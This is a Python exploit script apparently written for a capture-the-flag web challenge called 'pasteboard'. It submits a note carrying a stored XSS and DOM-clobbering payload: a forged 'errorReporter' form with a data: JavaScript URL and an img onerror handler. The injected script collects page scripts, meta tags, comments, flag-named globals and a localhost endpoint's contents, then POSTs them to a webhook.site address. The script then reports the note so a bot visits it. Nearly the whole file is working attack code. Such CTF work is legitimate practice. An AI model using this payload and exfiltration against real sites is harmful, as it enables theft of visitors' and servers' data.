import requests

BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

# Try various methods to find the flag
payload = f'''<form id="errorReporter"><input name="path" value="data:text/javascript,
(async function() {{
  let data = {{}};
  
  // Check all script tags
  data.scripts = Array.from(document.scripts).map(s => s.src + ' | ' + s.textContent.substring(0,100));
  
  // Check meta tags
  data.metas = Array.from(document.querySelectorAll('meta')).map(m => m.outerHTML);
  
  // Check comments in DOM
  data.comments = [];
  let walk = document.createTreeWalker(document, NodeFilter.SHOW_COMMENT);
  let node;
  while(node = walk.nextNode()) data.comments.push(node.textContent);
  
  // Try fetching telemetry endpoint
  try {{
    let r = await fetch('http://127.0.0.1:5000/telemetry/error-reporter.js');
    data.telemetry = await r.text();
  }} catch(e) {{ data.telemetry = 'error'; }}
  
  // Check for any global variables containing 'flag'
  data.globals = Object.keys(window).filter(k => k.toLowerCase().includes('flag'));
  
  await fetch('https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078/SEARCH', {{
    method: 'POST',
    body: JSON.stringify(data)
  }});
}})();
"></form>
<img id="renderConfig" src=x onerror="window.lastRenderError='x';throw new Error()">'''

print("[*] Doing comprehensive search for flag in DOM and scripts...")
print()

session = requests.Session()
resp = session.post(
    f"{BASE_URL}/note/new",
    data={"title": "Search", "body": payload},
    allow_redirects=False
)

if resp.status_code == 302:
    location = resp.headers.get('Location')
    note_url = f"{BASE_URL}{location}"
    
    print(f"[+] Created: {note_url}")
    
    report = session.post(f"{BASE_URL}/report", data={"url": location})
    if report.status_code == 202:
        print(f"[+] Reported!")
        print()
        print("[*] Check webhook for POST to /SEARCH")
        print("[*] Will show: scripts, meta tags, HTML comments, globals")
        print("    https://webhook.site/#!/d8111fd3-599a-47ab-bcab-94d5ec54e078")